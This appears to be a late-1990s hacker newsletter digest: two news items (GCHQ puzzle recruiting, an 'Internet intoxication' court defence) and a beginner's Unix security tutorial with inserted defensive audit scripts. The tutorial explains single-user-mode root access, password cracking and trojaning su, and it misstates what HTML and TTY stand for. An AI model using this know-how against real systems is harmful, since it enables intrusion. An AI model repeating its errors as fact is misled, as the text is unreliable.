From HNN http://www.hackernews.com/

contributed by Evil Wench

GCHQ, the British equivalent to the NSA, has posted several codes on its web sites in the hopes of identifying new recruits. The codes have been deciphered by 15 people since Christmas. GCHQ is hoping to fill 100 vacancies in its staff.

BBC
http://news.bbc.co.uk/hi/english/uk/newsid_601000/601960.stm

Government Communications HQ
http://www.gchq.gov.uk

Spying game lures hopeful snoopers

Cryptic messages concealed on the internet are being used to lure talented codebreakers to a career with British intelligence.

GCHQ, which eavesdrops on global communications for the UK Government, has placed a series of codes on its website and invited visitors to crack them.

The five-part puzzle unravels to form a message to potential job applicants, who may find their chances of employment greatly enhanced by cracking the code.

The unusual recruitment drive is reminiscent of the World War II effort to crack the Enigma code, used to direct German U-boats to their targets.

Station X

Then, keen crossword solvers, mathematicians, academics and chess masters were recruited to work at Bletchley Park - known as Station X - near Milton Keynes.

Their skills in cryptic analysis proved crucial in developing early computer technology, which succeeded in cracking the code.

The hidden code was posted on GCHQ's website before Christmas and the first person cracked it successfully within 48 hours. Fourteen others have managed it since.

But David Shayler, the former MI5 agent exiled to Paris after breaking the Official Secrets Act, told BBC News Online the exercise was pointless.
"GCHQ should put more effort into managing its staff better and adopting the kind of open approach that will ensure it employs the right people, instead of wasting time and money with games.

"And the kind of people with lively minds this appeals to will soon discover that this kind of thing is all done by computer anyway."

A GCHQ spokeswoman said the code, backed by a national newspaper campaign to recruit technologists and linguists, was aimed at catching the imagination of would-be applicants to fill up to 100 new vacancies.

"It is certainly a new way of contacting potential employees and it gives us an indication of the kind of skills we are looking for," she said.

"We hope people will be interested and challenged to have a go to see what they can find."

But those who do manage to crack the code are warned not to hand in their notice straight away.

All GCHQ applicants undergo a two-month vetting procedure in which their professional and private lives are placed under scrutiny - a process that may deter some of the internet's more "creative" hackers.

@HWA

107.0 Internet Intoxication Used as Defense 01/15/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

A teenager who has been accused of issuing a threat against Columbine high school via the internet will argue that he was suffering from 'Internet Intoxication'.

Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,500154005-500189672-500806798-0,00.html

'Internet intoxication' defense planned in Columbine threat case

Copyright © 2000 Nando Media
Copyright © 2000 APonline

By STEVE GUTTERMAN

DENVER (January 13, 2000 1:02 p.m. EST http://www.nandotimes.com) - A flamboyant Florida lawyer who offered a "television intoxication" defense in a 1970s murder case plans to argue that a teenager accused of making an online threat against Columbine High School was suffering from "Internet intoxication."
Michael Ian Campbell, an 18-year-old aspiring actor from Cape Coral, Fla., was "role-playing" when he sent a message threatening to "finish" what began in the massacre last April, Miami lawyer Ellis Rubin said Wednesday. Columbine students Eric Harris and Dylan Klebold shot and killed 12 students and a teacher April 20 before killing themselves in the nation's deadliest school shooting. "To intoxicate is to elevate yourself into a state of euphoria, even into madness," Rubin said. "You've logged on and gone into this imaginary world, this playland, this make-believe arena." He added: "That's why I call it Internet intoxication. The more they go into the Internet, the more bizarre their role-playing becomes." The U.S. attorney's office did not immediately return calls for comment on the strategy. Diane Cabell, a fellow at the Berkman Center for Internet & Society at Harvard Law School, sees little difference between the authors of anonymous Internet threats and people who make obscene phone calls. "They know what they're doing. It's just a cheaper way to stalk," she said. Rubin's strategy is something of an update of the argument he used in defense of another Florida teenager in 1977, when many baby boomers were as glued to their TV sets as their children are to computer monitors today. Ronny Zamora, 15, was convicted of murdering an elderly neighbor in Miami Beach after a trial in which Rubin argued that "television intoxication" led to the slaying. In an appeal, Zamora turned against his lawyer and claimed the TV intoxication argument made a mockery of his defense. But the court upheld the conviction and said Rubin's argument may have even worked to Zamora's advantage. Rubin also is known for a nymphomania defense. In 1991, he represented a woman accused of prostitution who blamed her actions on nymphomania that she said was a side effect of the antidepressant Prozac. The woman and her sheriff's deputy husband, accused of being her pimp, eventually pleaded guilty. 
Campbell, 18, is charged with transmitting a threat against another person in interstate commerce, punishable by up to five years in prison and a fine of $250,000. He goes on trial in federal court on Feb. 28.

@HWA

108.0 Blacksun's Unix Security For Newbies.version 1.0, 21/11/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Basic Local/Remote Unix Security for Unix Newbies
<===============================================>
version 1.0, 21/11/99

Written by: R a v e N, Black Sun Research Facility.
Black Sun Research Facility - http://blacksun.box.sk

<--! Begin copyright bullshit !-->
All copyrights are reserved. You may distribute this tutorial freely, as long as you keep our names and Black Sun Research Facility's URL at the top of this tutorial. I have written this tutorial for you, the readers. But I also wish to remain the author of this guide, meaning I do not want people to change a line or two and then claim that the whole guide is theirs. If you wish to create an altered version of this tutorial, please contact me by Email - barakirs@netvision.net.il.
<--! End copyright bullshit !-->

<--! Begin disclaimer !-->
Yada yada yada... you know the drill. I did not write this tutorial for people to learn "how to hack" and crack into and possibly damage other machines. It is solely intended to teach the reader a lesson about Unix security. Also, I am not responsible for any damage caused by using any of the techniques explained in this guide.
<--!
End disclaimer !-->

[ASCII art logo: Black Sun Research Facility, http://blacksun.box.sk, ASCII By : cyRu5]

Introduction
============

This guide is meant for Unix newbies who want to learn a little about basic Unix security, and how to secure their box. Most systems come very very insecure out-of-the-box. What is out-of-the-box (let's call it OOTB from now on), you ask? An OOTB system is a system which was just installed. All the default configurations are turned on, which means zero personalization (besides maybe a little personalization made during the installation process) and quite a lot of possible security problems. Also, there are some very basic concepts that most newbie Unix users aren't familiar with.
During this tutorial, I will teach you how to change default configurations, basic packet filtering, how to secure your system's networking services (or completely remove them or some of them, in case you don't need them, in order to increase your computer's security), how to use, how to avoid trojans, what are sniffers, how to maintain local security between different users in your system (if you're not the only one using this system, whether it's locally or remotely), some stuff about SSH, how to protect yourself against computer viruses under the Unix system, what are security scanners and how to use them, why you should encrypt your important data and how etc'.

Now, it is advised to go through Black Sun's previous tutorials (see blacksun.box.sk) prior to reading this tutorial. They contain some basic concepts and terminology which you need to know and might not be familiar with. Also, you should have some basic Unix knowledge and experience. If you don't have that kind of knowledge yet, we advise you to go to the local computer store and buy a basic Unix book (it shouldn't cost too much), or, if you really want to, order a specific one from the Internet (or even better: go to blacksun.box.sk/books.html and order a book from there. We get 15% of the money you pay... :-) This doesn't mean that you pay more, though. We simply get 15% out of the money you pay). Don't worry about online ordering, it's completely secure as long as you order your books from Amazon.com (they're considered the most secure E-Store on the planet, and I order lots of books from there).

Oh, one last note: this tutorial is in no way a complete one (Duh! It's a BASIC tutorial, in case you haven't read the title). I included everything I could possibly think of (that is notable for a beginner's guide in this field, of course).
With time, I will add more chapters, so make sure you have the latest version by visiting blacksun.box.sk often or subscribing to Black Sun's mailing list (info on how to subscribe at blacksun.box.sk also).

Okay, heads up! Here we go!

Setting The Ground
==================

First of all, I assume that you are using either RedHat Linux or Mandrake Linux. Why is that? Because most Unix newbies use either of these two distributions. Don't worry, it's no crime to use them or something, and it's not "lame". Each distribution has its advantages. RedHat and Mandrake, for example, both have simple installation and come with a lot of utilities built-in. That's okay, although I like Slackware Linux and OpenBSD better (I'll explain why in a second).

Now, some of you might be asking right now "but... but I have a different distribution! Will this stuff work for me too?". Before I answer this question (to the impatient ones of you, I can already say "yes", but that's not the exact answer. Read on and you'll understand), I want to explain what a distribution is (otherwise known as a "distro" or a "flavor" of Unix), why there are so many of them, where you could learn about all the different distributions and how to choose the right distribution for you.

Unix was first distributed freely and in open-source form. If you're not familiar with any programming language, then you're not familiar with the term "source code". I'll explain. The simplest way to show you what source code is is to send you to a webpage. Take hackernews.com (a personal favorite) for example. Every common browser has an option to view the page's source from within the browser, but let's pretend you don't know how to do this or you don't even have this option within your browser. First, wait for the whole page to load. Then, save it to your hard drive, a diskette or whatever. Then, open the HTML page you've just saved with any text editor (Pico, KEdit, Emacs, Notepad, UltraEdit, whatever). Now what do you see?
No more text and graphics and colors and layout, but plain good instructions. These are HTML instructions. HTML stands for Hyper Text Marquee Language, and it is the language used to create HTML pages, which can be read by your browser and used as instructions for how to build and display the web page.

The same goes with programming. To create a program, you need to know some sort of a programming language (C, for example), and then construct the program using commands which will later be given to a compiler (which will turn the source code file into an executable binary file, or in other words, a program which you can run and play around with) or an interpreter (the program runs as source code, and gets executed by a program called an interpreter, which reads the instructions in the source code and performs them. A popular interpreted programming language is Perl. Interpreted programming languages usually run slower, but have their advantages. We won't go into that now, though).

Okay, moving on. So now you know what source code is. As I've already explained, Unix was initially distributed freely and in source code form. This means that ANYONE with the right knowledge and skills can create his own version of Unix, to meet his special needs. A different version of Unix is called a distribution, a "distro" or a "flavor". Now go to www.linuxberg.com. Pick the closest mirror site and then enter the distributions page. It will display a list of Unix distributions, each one with its own characteristics, advantages and disadvantages.

This is all nice, but what happens if people start creating versions of Unix without paying attention to compatibility issues? For example, if I would have created my own version of Unix and called ls (the command that lists all files in the current directory in console mode (text-based interface) or in a virtual console (a console within a graphical window)) "list" instead?
This means that if someone would have made a program that called the ls command for some purpose, it wouldn't work anymore (unless I create a command called ls that calls my own command - list. But in that case, I have to make sure that list has similar rules to ls). See the problem? Also, if I go to my friend's house, which could be using a different distribution, how could I possibly use his computer if everything is completely different?

This is why there are standards. Every Unix distribution has to meet these standards so it will be compatible with other versions. This is also why most (if not all) of the stuff I am about to teach here will work in all distributions. If you have a certain problem or question, ask in our message board (find it at blacksun.box.sk).

Oh, almost forgot... in the beginning of this section, I have clearly stated that I like Slackware Linux and OpenBSD more than RedHat Linux and Mandrake Linux. Why is that? Simply because they have some advantages, such as even more stability, security, speed and encryption, and they top all the other distributions in these fields. Of course, they are much harder to work with (have you ever tried to install OpenBSD?! To a person who installed Mandrake Linux, which is the easiest to install, and is almost as easy as installing Windows 95, it would look like hell!!).

Okay, let's move on to the actual security information, shall we?

First Thing's First: Local Security
===================================

First of all, let's think: why would you want to improve your computer's local security? Well, if you're the only one using this computer, and you don't intend to let anyone into your computer (at least not intentionally), then you should only read this chapter for pure knowledge. But if you're running a multi-users system, you definitely should improve your local security. What is local security?
Well, local security is about the different users on this computer, whether they are local users (they have local access to the computer. They use a keyboard, a monitor and what-not that are directly connected to the actual box, not through some sort of a local area network (LAN) or the Internet) or remote users (users accessing your computer, whether legally or not, using Telnet, SSH, RLogin etc' and through a local network or the Internet). If you have such users, you need to increase your computer's local security.

Let's start with a basic lesson about file permissions.

Unix File Permissions And The Password File
-------------------------------------------

First of all, you need to learn about the way the system works with different users. Here is a mini-tutorial out of the Byte Me page at my website that will explain what the Unix password file is and how it works, thus explaining to you a little more about this subject.

Password files == world readable + how do password files look like?
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

First of all, a file that is world readable is a file that can be read by ANYONE on the system, even the most inferior user. On most systems today, the password file (usually /etc/passwd) is world readable. Does this mean ANYONE can get the encrypted passwords and decrypt them? Definitely not! A password file consists of several (or one) lines, where each line represents a user. The password file looks like this:

username:password:uid:gid:free text:home directory:shell

Username - the user's username.

Password - the user's password, encrypted using altered DES encryption (can be cracked in a matter of time, though [note: we'll get to cracking the password file later]).

UID - User ID. If your UID is 0, you have root privileges (nothing can stop you, and you can even type "su username" (without the quotes) to become a different user. Type exit to return to your root shell after you're done. Btw SU stands for Switch User).
If two users have the same UID, they'll have identical permissions.

GID - Group ID. The same as UID, with root being GID=0. GID lets you set ownership patterns and access patterns for a group of users (or a single user) who have different or identical UIDs but have the same GID.

Free text - some free text about the user. For info on how to exploit this field in order to get private information about people, read the Info Gathering tutorial here.

Home directory - where the user's private configurations files are stored. Usually /root if you are root, or /usr/your-username or /home/your-username if you're another user.

Shell - the program that gets executed once you log in. Usually a command interpreter (a program that receives commands from you and executes them).

Now, most systems will make /etc/passwd world-readable, but don't put the passwords in it. Instead, they will put a single character, such as *. The passwords will be stored at the shadow file, which is not world-readable, and is usually stored at /etc/shadow. The shadow file is identical to the /etc/passwd file, only it has the encrypted passwords. Some shadowing programs can also improve the encryption schemes, but that's not important to us right now.

The /etc/passwd has to be world readable if you want to:

1) Find out what's the username of a certain UID. Very useful in some situations. For example: each file has an owner. The owner can change access patterns for this file, or change its ownership. Root can own all files if he/she wants to. The owner's UID is inserted into the file. Programs such as ls (ls stands for list. It views the contents of a directory. For more info about it and its uses, type "man ls" without the quotes on a Unix system) can tell you who owns a file. If they don't have access to the password file (programs run with your privileges, unless they are SUID, in which case they run with the privileges of the user who SUIDed them.
People try not to use SUID, because it poses lots of security threats), they will only be able to present you with the UID of the owner. But if they have access to the password file, they can find the appropriate username for this UID.

2) Find out information about people (what's their home directory, what's their shell, what's written in their free text area etc').

3) Etc' etc' etc'... be creative!

EOF

In case you're wondering, EOF stands for End Of File. This means that... well, duh! End of file! That's it, you've just finished that nice little mini-tutorial.

Now I assume you want to learn how to change file permissions. So, in order to change file permissions, you need to learn how to use the chmod command. Now, I am about to guide you on the process of finding information about Unix commands by yourself. It's quite easy.

Okay, let's try man first. Man stands for manual. Man is a command that displays a manual page for a specified command. The syntax is: man command. For example: man ls, man cd, man more etc'. So let's try to type man chmod. AHA! No man entry for chmod... :-/ (some systems might have a man page for chmod)

Let's try using info. We type info chmod. AHA! This time, we're getting something. So let's see... it says a little about the chmod command, but it doesn't explain how to use it! Oh, wait, look at this - there are links within this guide. Simply position your cursor within a word, a couple of words or a sentence that link somewhere else (they always have a * in front of them) and hit enter. Keep following links until you learn about chmod and about file permissions.

Runlevels
---------

I have decided to quote a nice mini-tutorial from the Byte Me page at my website instead of just writing about runlevels all over again (I don't like doing things twice).

What Are Unix Runlevels?
++++++++++++++++++++++++

If you've been paying attention to what your Unix box does during startup, you should have noticed that it says: "Entering runlevel x" (where x is a number between 1 and 5) at one point of the bootup stage (after it mounts your root filesystem (your "/" directory) into read-write mode, sets up sound, finds your RPMs ("Finding module dependencies...") etc').

A runlevel is a bootup/shutdown sequence. It consists of a list of commands to run on startup and a list of commands to run on shutdown (or when switching to different runlevels).

Now, first of all, let's see how you can switch runlevels. Bah, that's easy. Simply type init x, where x is a number between 0 and 6. Runlevel 0 is for "halt" (turning off your computer, if you have APM - Advanced Power Management, and if you have APMD - APM Daemon, installed. All modern CPUs have APM), runlevel 6 is for reboot and the rest are various runlevels. 5 will bootup everything - it will even automatically run X and ask you for your login and password in a graphical interface (by default, of course. You can change this). Runlevel 1 is considered the single-mode runlevel. It does the least possible (kinda like "safe mode" in Windows) and doesn't even require you to enter a password (but only root can switch runlevels, so you have to be either root or have physical access to the computer during startup (we'll get to that later)).

To edit your runlevel list, you can either:

a) Go to /etc/rc.d/rcx.d/ (where x is the runlevel's number) and play around within this directory. It contains symbolic links (kinda like shortcuts in Windows. For more information about symbolic links (otherwise known as "symlinks"), type man ln) to programs (including their parameters) that will be executed, and symbolic links to programs that will be killed on shutdown. Play around to find out more (but ALWAYS make backups!!).

b) (this should work on most Unix boxes) Switch to the runlevel you want to edit. Then type setup.
Go to system services, and select/unselect the services you want to run on startup and kill on shutdown.

c) The easiest way - on most systems, you will be able to type the command control-panel within an xterm (a "virtual terminal" - a console window within X-Windows) and get a nice little window thingi with lots of buttons and suchlikes. Find the button that says "runlevel editor" when you put the mouse above it for a second or two. Then click on this button and play around with the programs. I'm sure you'll figure out how to use it yourself. It's quite self-explanatory, and it contains help files and documentation if you really need help.

And now, for a nice little runlevels-related hack. Now, if you're reading this document, you're probably a Unix newbie, so you probably use Redhat Linux, Mandrake Linux etc'. If so, you should have a prompt saying "boot:" or "LILO boot:" or "LILO:" when you start your computer, and you could either type Windows or Linux (you can change these names into, say, sucky-OS for Windows and Stable_and_secure_OS for Linux, or anything else you want. Use the linuxconf program to edit LILO's preferences, and use your imagination... :-) ).

Now, what happens if you type linux 5? Of course! It boots up Linux in runlevel 5!! But wait! What happens if you type linux 1 or linux single? It runs on runlevel 1 - single user mode, which means... automatic root access! No password needed. :-) Most people simply don't realize how dangerous this could be.

EOF

Now, imagine that some evil cracker (e.g. your grandma... :-) ) reads this document and then locally roots your computer somehow (the verb 'to root' means 'to get root access to a computer, not necessarily one that runs Unix'). Scary, huh? That was as easy as stealing a candy from a baby (not that I've ever done that... /me looks away... :-) ).

Cracking The Password File
--------------------------

As you should already know by now, the password file has some encrypted text within it.
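The field rules from the password-file mini-tutorial above (placeholder versus hash in the password field, UID 0, shared UIDs) and the shadow file's permissions can be checked with a short script. This is an added example, not part of the original tutorial; the function names, finding labels and sample entries are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: audit a passwd-format file against the field rules above.
# Function names, finding labels and sample data are illustrative only.

# audit_passwd [FILE]: reads FILE (or stdin) in the format
#   username:password:uid:gid:free text:home directory:shell
# and prints one finding per line as LABEL:username.
audit_passwd() {
    awk -F: '
        # Skip blank lines and comment lines.
        /^[ \t]*$/ || /^#/ { next }

        # Every entry must have exactly seven colon-separated fields.
        NF != 7 { print "MALFORMED:" $1; next }

        {
            user = $1; pw = $2; uid = $3

            if (pw == "") {
                # No password at all: anyone can log in as this user.
                print "EMPTY_PASSWORD:" user
            } else if (pw != "x" && pw != "*" && pw !~ /^!/) {
                # Not a placeholder, so the hash sits in a world-readable file.
                print "HASH_NOT_SHADOWED:" user
            }

            # The UID must be a plain decimal number.
            if (uid !~ /^[0-9]+$/) { print "BAD_UID:" user; next }
            key = uid + 0

            # UID 0 means root privileges, whatever the username says.
            if (key == 0 && user != "root") { print "EXTRA_UID0:" user }

            # Two users with the same UID have identical permissions.
            if (key in seen) {
                print "DUPLICATE_UID:" user "=" seen[key]
            } else {
                seen[key] = user
            }
        }
    ' "$@"
}

# is_world_readable FILE: succeeds if the "other" read bit is set on FILE.
# /etc/passwd is expected to pass this test; the shadow file must not.
is_world_readable() {
    [ -n "$(find "$1" -prune -perm -004 2>/dev/null)" ]
}

# Constructed sample entries (not from any real system). The hash in the
# entry for bob is a made-up 13-character string standing in for a crypt hash.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/sbin/nologin
alice:x:500:500:Alice:/home/alice:/bin/bash
bob:ab1Cd2Ef3Gh4I:501:501:Bob:/home/bob:/bin/bash
carol::502:502:Carol:/home/carol:/bin/bash
toor:x:0:0:second root:/root:/bin/sh
dave:x:500:500:Dave:/home/dave:/bin/bash
EOF
}

# Demo on the constructed sample. On a real box: audit_passwd /etc/passwd
sample_passwd | audit_passwd

# Report a shadow file that anyone on the system can read.
if [ -e /etc/shadow ] && is_world_readable /etc/shadow; then
    echo "WORLD_READABLE:/etc/shadow"
fi
```

Any line of output is something to fix: move hashes into the shadow file, set or lock empty passwords, and make sure only root has UID 0.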
Let's discuss the encryption scheme first, shall we? Unix password file encryption is based on an altered version of DES encryption. If you try to decode an encrypted Unix password (let's call it a hash from now on. That's the proper name for it) using standard DES decoding, you will get a null string. Nothing. Nada. Zero. No, not even zero. You simply won't get anything.

So how do you open this door? With a key. :-) Key-based encryption (e.g. PGP, which stands for Pretty Good Privacy, and has very powerful encryption schemes) is an encryption scheme where you need to have a key, which is a set of letters (lowercase or uppercase), numbers, symbols etc. (it could be just numbers, symbols and lowercase letters, all letters, etc.). So in Unix "crypt" (from now on, crypt means Unix password file encryption), the key is actually the first eight characters of the user's password (you can add extra characters to the key, which can be generated randomly, for extra security. These are called salts. I won't explain much about them here because I don't believe I know enough about them to do so), so you need the user's password to decode the hash (but if you have the user's password, why would you want to decode his hash if you already have the password? :-) ).

So, crypted passwords cannot be cracked, right? WRONG! You can use a password cracker such as John the Ripper or Cracker Jack (there are both Unix versions and Windows versions. Sorry, I don't have URLs to download them) to crack the hashes. But how do these things work? A password cracker generates random passwords and then tries to break the hash by using this password as the key. If it fails, it simply tries another password until it gets it right. Password crackers can try thousands of passwords per second on modern computers.

There are two methods of password cracking - brute-force and dictionary attacks. In brute-force mode, your password cracker guesses passwords systematically.
You can set a minimum number of characters for the password, and tell your cracker what to create the password out of (lowercase letters, uppercase letters, numbers, symbols etc.). In dictionary attacks, your password cracker takes words out of a simple text file called a 'dictionary file'. Each line in this file represents a single word for the password cracker to try. Dictionary files usually have an advantage over brute-force attacks, because if you know that the target's password has something to do with dogs, you could download a dictionary file about dogs. If you know it's the name of some philosopher, you could download a dictionary file containing the names of all known philosophers. You can also download all-purpose dictionaries that contain various words (these usually have the greatest chance to succeed). The best place to download wordlists from is theargon.com.

So, as you can see, if someone obtains your hashes somehow, he could decode them and break into your computer. This is why all users on your system should have a long password, and preferably not a dictionary word. If you need help with using a password cracker or have any further questions, try asking them on the message board at blacksun.box.sk (it's ours, btw... :-) ).

Trojans
=======

Yes, trojans. Most people who read this might be thinking about Netbus, Back Orifice, Sub7 and other Windows trojans. These aren't trojans. Okay, I mean, they ARE trojans, but not this kind of trojans. They are 'remote administration trojans'. First, let's understand what this name means, and then you'll see what they have to do with Unix in general and with local security in particular (as well as remote security). Let's start with the word trojan:

Trojan - In Greek mythology, there is a story about the 'trojan horse'. The Greeks were trying to capture the city of Troy for a reason which is beyond this guide (you should really read the whole story or get the movie or something. It is quite good).
They were camping outside Troy for about ten years and they still didn't manage to get in. Then, they came up with a brilliant plan: the whole army pretended to be leaving the area, and they left a giant wooden horse for the Trojans as some kind of a present (to honor the Trojans for being so good). Within this horse sat a couple of soldiers. When the Trojans found the giant horse, they carried it inside and then, under the cover of night, the soldiers inside it came out, opened the city's gates and let the entire Greek army get in, which eventually led to the fall of the city of Troy. So, as you see, a trojan program is a program that does not do what it proclaims to be doing. It could either be a harmless joke (a joke program that pretends to delete your entire hard drive or any other kinds of computer joke programs) or a malicious program which could harm your system.

Remote administration - To remotely administer a system means to be able to work on this system as if you had local ("physical") access to it. Being able to remotely access your system (or "to remotely login to it") is useful for getting files off your system, working on your system from a distant place etc.

Remote administration trojan - A trojan program that lets the author of the program, the person who sent you the program or any other person in the world access your computer and remotely administer it (this is why Remote Administration Trojans, or RATs, are often called remote administration "backdoors" - they open a "back door" for the attacker to get in). This is exactly like depositing your entire system and everything on it into the hands of the attacker.

The most dangerous thing about RATs would probably be that most of them (especially Netbus and Sub7) are extremely easy to use and understand, and come with one or two pages of instructions (yes, they're THAT simple), so any little kid can use them.
Most of these "kids" have no idea what this program or other programs that do most of the work for them do, which led to the nickname "script kiddies" - "lamers" (a lamer is a person who acts immaturely or stupidly) with programs that do all of the work for them. Technically, a script kiddie can crack into the Pentagon if he is given a program that does everything for him. But does he know how this whole thing works? Will he know what to do once he's in? I doubt it.

Now, malicious trojan programs can do a lot more than that. There are also trojans that allow the attacker to have local access to any user who runs the program (if root runs it, the whole system is doomed. This is one of the reasons why no sensible system administrator would work as root all the time, and instead make himself a less-privileged account to work with). This is useful if the attacker has an account on this system and wants to get access to some other user's files (or even root access, which means access to practically everything).

Also, if you gain write access to a commonly-used application (such as su, which lets you run a sub-shell as another user by simply giving his password instead of having to relogin. SU stands for Switch User. Oh, by the way, root doesn't need to supply a password to su if he wants to gain access to some other person's account), you can trojan these applications. Let's take su for example - if you manage to change su so it'll send you every username and password which it received, you could eventually capture your target's password or even root's password.

So, kids, this is why you should beware of trojans. Be very careful with what you run.

Also, there are programs called checksum checkers. These programs perform periodical tests (once a day, once an hour, once a week etc., depending on how you configure them) that determine if the size of some applications (you can deselect default applications to test or add new applications by yourself) has changed.
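A baseline-and-verify check of the kind described above, as an added example that is not part of the original tutorial. It records a SHA-256 digest alongside each file's size, because a file can be replaced by one of the same length; the file names and contents are constructed stand-ins for system binaries.

```python
import hashlib
import os
import tempfile


def fingerprint(path):
    """Return (size, SHA-256 hex digest) of a file, read in chunks."""
    digest = hashlib.sha256()
    size = 0
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
            size += len(chunk)
    return size, digest.hexdigest()


def snapshot(paths):
    """Baseline taken while the files are still trusted."""
    return {path: fingerprint(path) for path in paths}


def verify(baseline):
    """Return {path: [what changed]} for every file that differs from the baseline."""
    findings = {}
    for path, (old_size, old_hash) in baseline.items():
        if not os.path.exists(path):
            findings[path] = ["missing"]
            continue
        size, digest = fingerprint(path)
        changed = []
        if size != old_size:
            changed.append("size")
        if digest != old_hash:
            changed.append("sha256")
        if changed:
            findings[path] = changed
    return findings


def demo():
    """Constructed stand-ins for su, ls and ps, two of them modified after the baseline."""
    with tempfile.TemporaryDirectory() as root:
        su = os.path.join(root, "su")
        ls = os.path.join(root, "ls")
        ps = os.path.join(root, "ps")
        for path, body in ((su, b"#!/bin/sh\necho original su\n"),
                           (ls, b"#!/bin/sh\necho original ls\n"),
                           (ps, b"#!/bin/sh\necho original ps\n")):
            with open(path, "wb") as fh:
                fh.write(body)
        baseline = snapshot([su, ls, ps])

        # Same-length replacement: a size-only check reports nothing for su.
        with open(su, "wb") as fh:
            fh.write(b"#!/bin/sh\necho modified su\n")
        # Appended bytes: both the size and the digest change for ls.
        with open(ls, "ab") as fh:
            fh.write(b"echo extra\n")
        # ps is left untouched and must not be reported.

        report = verify(baseline)
        return {os.path.basename(path): changed for path, changed in report.items()}


if __name__ == "__main__":
    for name, changed in sorted(demo().items()):
        print(name, "changed:", ", ".join(changed))
```

Store the baseline on read-only or offline media, since anyone able to replace a binary can usually rewrite a baseline kept beside it.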
If someone has trojaned one of those applications, its size should change, but it is also possible (although much harder) to trojan a program without affecting its size, but that's outside the topic of this guide.

Unix Viruses
------------

The computer virus problem is much less harsh under the Unix platform, but if you want to keep your data intact, you should be aware of the problem, which still exists. There is an incredibly small number of viruses in the wild for the Unix operating system (a virus that is "in the wild" is a virus that has gone through a network of any kind and started infecting computers on this network, just like a biological virus, when it escapes a restricted laboratory environment and goes into "the wild" and starts infecting people). This is because virus writers are less motivated to write viruses for Unix, for the following reasons:

A) Most people who use Unix are more mature than other computer users. Virus creators who intend to infect other computers are immature people.

B) Because of access restrictions in the Unix operating system, if a user runs a file that is infected with a virus, the virus can't go far, and it can only do what this user has privileges to do (although, if a root-privileged user runs a virus, it can infect the whole system and freely travel to other systems). So, because there are files that some users can access and some other users can't, Unix viruses can't spread far.

Still, the problem exists, and we want to protect our data, right? This is why you should still get yourself a Unix virus scanner. Because of the extreme lack of viruses in the Unix system, there are no "big titles" of virus scanners. Try going to altavista.com and searching for Unix virus scanners. Download some different ones and compare the quality of their scans and the amount of resources they consume.

Encryption
----------

Encrypt your important files. Use PGP for better encryption.
If someone penetrates your computer's security, it will be much much harder for him to get your important data if you encrypt it. For more information about encryption, read Black Sun's encryption tutorials at blacksun.box.sk (go to the tutorials page and then find the encryption section. We have some guides for beginners about PGP and encryption in general).

Remote Security
===============

Why would you want to improve your computer's remote security? DUH! If you ever plan to hook your computer into a LAN, the Internet or any other kind of network, you immediately increase the chance of you getting hacked. You should definitely attend to your remote security (unless you like getting your ass rooted). Also, you should read the local security part first, since it contains a lot of information you need to know before you read this, and also quite a few tricks that work for both local security and remote security.

Remote Root Logins
------------------

Before I explain to you what the issue with remote root logins is and how to block them, I need to explain to you what a TTY is first. Unix is a multi-user system, right? And on multi-user systems, many users, each one with his own monitor or any other type of terminal, can work on the same computer, right? Now, this computer is obviously running more than one process (a process is a running program), since it has multiple users on it. Each process receives some input and sends out some output. Well, then, how will this computer know whose input is whose and where to direct the output of each program? You wouldn't want to receive the output of processes that other users are running, right? (well, technically, if you're a malicious cracker, you'd love to receive the output of other users' processes, but we're getting off-topic now). This is why each user has a TTY. TTY stands for Terminal TYpe. Each user has its own TTY, which can be composed of letters and numbers.
That way, the computer knows where the input comes from (from which TTY) and where to direct the output to.

Okay, first, let's make an experiment. Run a text-based console or an XTerm window (a console window from within X-Windows, the popular Graphical User Interface, or GUI, of Unix systems) and type the command who. This will show who is logged into the system (his username), when he logged in and what his TTY is. By the way, if you prefer a graphical version of the who command, try typing gw within an XTerm or within a "run command" box in X. This program should come with the gnome window manager.

Okay, let's move on. Now that we know what TTYs are, let's edit the file /etc/securetty with a simple text editor. Now, what do we have here? We have a list of all TTYs that can log in as a root-privileged user. My /etc/securetty file looks like this:

    tty1
    tty2
    tty3
    tty4
    tty5
    tty6
    tty7
    tty8

Okay, let me explain myself. Your computer should have eight virtual consoles. You can switch virtual consoles by pressing ctrl+alt+F1 for console #1, ctrl+alt+F2 for console #2 etc. You can imagine how useful this could be. Consoles #7 and #8 are usually reserved for graphical displays, so if you run X, it should appear in #7, and if you run another X process, it should appear in #8. These eight local consoles have these TTYs: tty1 for #1, tty2 for #2 etc.

Now, as you can see, my /etc/securetty file contains only those local TTYs, so no remote user can login as a root-privileged user into my computer, even if he has all the usernames and the passwords. Now, of course, if someone has all the passwords, he could log in as another user and then use su to switch to root. So the /etc/securetty thing isn't exactly some fail-proof method, but it'll block off some intruders.

Watching Your Processes
-----------------------

If you intend to have several users logged into your system, you should really watch what they're running, and how much system resources they're hogging.
Here are a few methods to watch your users:

Using PS
++++++++

Type in the command ps -aux. Quite a list, huh? Now, if you want it to be more readable, try doing ps -aux | more or directing its output into a file, like this: ps -aux > some-file-name. If you want to look for specific entries within this list, try doing ps -aux | grep some-text and it'll display lines within the output of ps -aux that contain some-text (or whatever you type in). Oh, by the way, as far as I know, PS stands for ProcesseS.

Using Top
+++++++++

Type the command top. Cool program, huh? Quite useful... you should have a whole virtual console or a whole XTerm devoted exclusively to it. If you prefer a graphical display, try typing gtop (a graphical version of top that comes with the gnome window manager) or kpm (stands for KDE Process Manager. Comes with the KDE window manager).

Eavesdropping
+++++++++++++

If you're a root-privileged user and you want to see what the other users on your system are typing, consider using a command called TTY Watch. It will eavesdrop on the TTY of the user(s) you choose to eavesdrop on, and let you know exactly what they're typing and exactly what they see on their monitors. Try searching for the latest version of ttywatch at Packet Storm Security (packetstorm.securify.com), Security Focus (securityfocus.com), Linux.Box (linux.box.sk), Astalavista (astalavista.box.sk) etc.

Playing With INetD
------------------

